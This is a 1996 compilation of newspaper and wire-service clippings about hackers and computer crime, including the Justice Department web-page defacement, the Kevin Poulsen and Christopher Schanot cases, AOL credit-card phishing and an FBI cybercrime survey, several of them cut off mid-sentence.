[ HELL YES!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ]


Cracking Down on the Outlaws of Cyberspace                       July 2, 1996
by M.J. Zuckerman (USA Today) p. 4B

What's it take to be America's top cybercop?

"I was a hockey referee, so I'm used to being beaten up," suggests Jim
Christy, who is among those most often mentioned for the title.  And he's
been at it for only a decade.

Today, with the weighty title of Chief of Computer Crime Investigations
and Information Warfare, he is one of 68 computer investigators in the
Air Force Office of Special Investigations (OSI).

Christy, a Baltimore native, stumbled into the computer field.  After
drawing No. 35 in the draft lottery during the Vietnam War, he joined the
Air Force rather than waiting to be drafted.  He spent the next four years
as a computer key punch operator, followed by 13 years as a civilian working
computers at the Pentagon.

When he moved to OSI, Christy largely ceased his hands-on involvement with
computers and systems.

Since last fall, Christy has been on temporary assignment to the Senate
Permanent Subcommittee on Investigations, helping them examine security
in cyberspace.

"I like working up on Capitol Hill, because you can make a difference,"
Christy says.


Hackers Penetrate Justice Department Home Page                August 18, 1996
(AP News Wire)

Internet hackers infiltrated the Justice Department's home page
yesterday, altering the official web site to include swasticas,
obscene pictures and lots of criticism of the Communications Decency Act.

The official web site, which was turned off by government technicians
when it was discovered, was changed to read "United States Department of
Injustice," next to a red, black and white flag bearing a swastika.

The page included color pictures of George Washington, Adolf Hitler, and a
topless Jennifer Aniston.

[ A link to a copy of the page is it ]


Employment Prospect Grim for Hacker                           August 19, 1996
(AP News wire)

Employment prospects are grim for Kevin Lee Poulsen, a computer whiz
imprisoned five years for his cyberspace havoc.

The 30-year-old hacker has been barred from getting near a computer for the
next three years and he now fears selling cowboy boots at a Western store
will be his only opportunity to make some money.

"It's the only place where I've been greeted with a positive attitude," he
said during an interview last week.  "I can't get a job that I am qualified
for, basically."

On September 3, he goes to federal court in hopes of having some of the
computer restrictions relaxed.


School Hires Student To Hack Into Computers                   August 22, 1996
(The Sun Herald)

Students at Palisades Park's high school needed their transcripts to
send off to colleges.  But they were in the computer and no one who knew
the password could be reached.  So the school hired a 16-year-old hacker
to break in.

Superintendent George Fasciano was forced to explain to the School
Board on Monday the $875 bill for the services of Matthew Fielder.


Feds aim low on hacker crackdown                                June 21, 1996
by Lewis Z. Koch (Upside Online News)

Nineteen-year-old Christopher Schanot of St. Louis, Mo. has been
languishing in a Federal jail since March 25, 1996, charged with four
counts of computer hacking. He is not allowed to post bond, because
Federal authorities contend he is "a computer genius intent on
infiltrating computer systems of some of the largest companies and
entities in the country," and because a jailhouse snitch claims Schanot
bragged he would run away if he were released. He has never been charged
with a crime or arrested before. 

Schanot's problems began after he ran away from home on May 30, 1995,
taking some of his disks, a hard drive and personal items. According to a
knowledgeable source close to Schanot, Chris felt his parents, especially
his father Michael, didn't understand or respect him. 

Less rocky, it seems, was his relationship with Netta Gilboa, a
38-year-old woman living near Philadelphia. Gilboa is editor-in-chief and
publisher of _Gray Areas_, a slick, text-heavy, irregular magazine that
explores the "grey areas" of "alternative lifestyles and deviant


City of London Surrenders To Cyber Gangs                         June 2, 1996
(Times of London)

City of London financial institutions have paid huge sums to international
gangs of sophisticated "cyber terrorists" who have amassed up to 400 million
pounds worldwide by threatening to wipe out computer systems.

A Sunday Times Insight investigation has established that British and 
American agencies are examining more than 40 "attacks" on financial 
institutions in London and New York since 1993.

Victims have paid up to 13 million pounds a time after the blackmailers 
demonstrated their ability to bring trading to a halt using advanced 
"information warfare" techniques learnt from the military.

According to the American National Security Agency (NSA), they have 
penetrated computer systems using "logic bombs" (coded devices that can 
be remotely detonated), electromagnetic pulses and "high emission radio 
frequency guns," which blow a devastating electronic "wind" through a 
computer system.

The gangs are believed to have gained expertise in information warfare 
techniques from the American military, which is developing "weapons" 
that can disable or destroy computer hardware. Some are also known to 
have infiltrated banks simply by placing saboteurs on their payroll as 
temporary staff.


Credit Fraud on AOL
(AP Newswire)

Two boys posed as billing representatives for an online service and stole
at least 15 credit card numbers, and used those numbers to buy $15,000
worth of merchandise, from computer equipment to cymbals, police said.

The two 16-year-olds were charged with 39 counts of possession of
stolen property, theft and attempted fraud. They were released to the
custody of their parents pending a Family Court hearing.

Police believe the boys obtained a program designed by computer
hackers to flimflam customers of America Online.  It sends a message to
users saying they will be cut off if they don't type in their name,
credit card account number and computer service password.


FBI Survey Reveals Growth of Cybercrime                           May 6, 1996
by Rory J. O'Connor (San Jose Mercury News)

Intruders are breaking into the nation's computer systems at an
increasing rate and often with more nefarious motives than in the
past, according to a survey co-sponsored by the FBI and a private
group of computer security professionals.

"What this shows is that the ante has been upped in cyberspace," said
Richard Power, senior analyst of the Computer Security Institute in
San Francisco, which conducted the survey. "As all manner of commerce
moves into cyberspace, all manner of crime is moving there as well.
It's no longer just vandalism."

More than 40 percent of the 428 corporate, university and government
sites that responded to the FBI survey reported at least one
unauthorized use of their computers within the last 12 months, with
some institutions reporting as many as 1,000 attacks in the period.

It also appears that there's more computer crime for hire occurring,
Power said, exploiting mainly older hackers who have graduated to
making money off the skill they once used simply to establish bragging
rights with their peers. He suggested that some of the hiring is being
done by intelligence services of various governments, although he
offered no proof.


University hacker to be hunted on the Internet                 April 27, 1996
By Robert Uhlig (London Daily Telegraph)

Computer experts at Cambridge University are using the Internet to hunt
for a hacker who breached their security systems to access some of the
world's most sensitive research information. 

The authorities had no indication that the hacker deleted or altered
files, "although there was the potential for that", he said. Files
belonging to world-renowned research scientists may have been viewed or
copied, giving the hacker an insight into commercially and academically
sensitive material. 

The hacker used a so-called sniffer program, which sat silently within the
computer system for four weeks, monitoring its activities. This could
allow the hacker to compile a list of all passwords to give him unhindered
access to every computer on the university's network. "There was the
potential to access any material on any computer anywhere on the
university's network - ranging from electronic-mail to confidential
research data," said Mr Stibbs. 


Agents' Codes Exposed on Web                                   March 16, 1996
By: Robert E. Kessler (Newsday)

In an attempt to help (Ed) Cummings, and discredit the Secret Service, a Long
Island-based hacker magazine last week launched a page on the World Wide
Web publishing lists of Secret Service radio frequencies, photographs of
agents, and codenames used by the agency for officials and buildings.

Last year, Cummings, a 35-year-old native of Reading, Pa., pleaded
guilty to federal charges in Philadelphia of possessing telecommunications
equipment with intent to defraud and served a seven-month prison sentence.

As a result of that conviction, last week Cummings was sentenced by a
judge in Easton, Pa., north of Philadelphia, to serve a six- to 24-month
sentence for violating probation after pleading no contest to a 1994 charge
of tampering with evidence in another telephone hacking case.

"Painting this guy as some white knight or someone who is standing up
for free speech is wrong," said Kun. "He's engaged in fraud."

Cummings' attorney, Kenneth Trujillo, could not be reached for comment.


Judge Denies Bond to Accused Hacker                             April 6, 1996
by Tim Bryant (St. Louis Post Dispatch)

After another prisoner said accused computer hacker Christopher Schanot was
planning a quick escape from his parents' home near High Ridge, a federal
magistrate decided Friday to keep Schanot in jail.

"He said he would wait a couple of days and take off," testified the
prisoner, Gerald Esposito.

Schanot's lawyer, federal public defender Norm London, told Davis that
the alleged conversation between the young man and Esposito never happened.

London, pointing out that Esposito has convictions for sexual assault,
said the older prisoner had "made overtures" to jail officials about moving
Schanot into Esposito's housing area.


Hacked Off! Government, Firms Fight Computer Intruders          April 7, 1996
by Colleen Bradford (St. Louis Post Dispatch)

Every day, hundreds of people in front of personal computers try to sneak
into corporate and government computer networks. Sometimes they just look
around, sometimes they destroy data and sometimes they steal personal and
classified information.

Two weeks ago, law enforcement officials charged an Argentine, 21, with
using the Internet to illegally break into computer networks at Department
of Defense installations, the NASA, Los Alamos National Laboratory and
several universities. The Justice Department is now seeking Julio Cesar
Ardita, who accessed confidential research files on aircraft design, radar
technology and satellite engineering.

And Chris Schanot, 19, from High Ridge, was in court in St. Louis last
week on charges of hacking. Schanot, who fled to Pennsylvania from St.
Louis after graduating from Vianney High School last May, is accused in a
five-count indictment of breaking into the computers of Southwestern Bell,
Bell Communications Research, Sprint and SRI International, a research and
development contractor with government contracts. His trial is set for June

Schanot, like other hackers, likely became addicted to the feeling of
power that cracking into a private computer network brings, said St. Louis
County Police Sgt. Thomas Lasater, who has been investigating computer
crime for seven years.

"Normally these young hackers do not use the computers for financial
gain," Lasater said. "It's just a challenge for them to see what they can


Mike and Terry's Dreadful Adventure
by Elizabeth Weise (AP Newswire)

Terry Ewing was late.  His plane left in an hour and he was cutting it close.
But he couldn't tear himself away from his computer and the hole he'd hacked
into the security network of Tower Records.

He kept poking around, looking for something interesting to take to the
hackers' convention he was going to.  Finally, five minutes before the
airport shuttle beeped in front of his apartment, he downloaded a file
containing 1,700 credit card numbers. 

"We didn't expect anyone was watching," he said seven months later -
through an inch of Plexiglas at the Sacramento County Jail. 

Ewing had had second thoughts about taking the Tower Records file with
him on July 31, so he left it on his hard drive while he and Kim hit
DefCon, the biggest of the West Coast hacker gatherings, for a weekend of
bragging, hanging out and messing around. 

"We never guessed they were onto us.  Their security was so weak it
really blew," the 20-year-old Kim says by phone from the sixth floor of
the same jail that held his friend.  He is facing an 18-month sentence.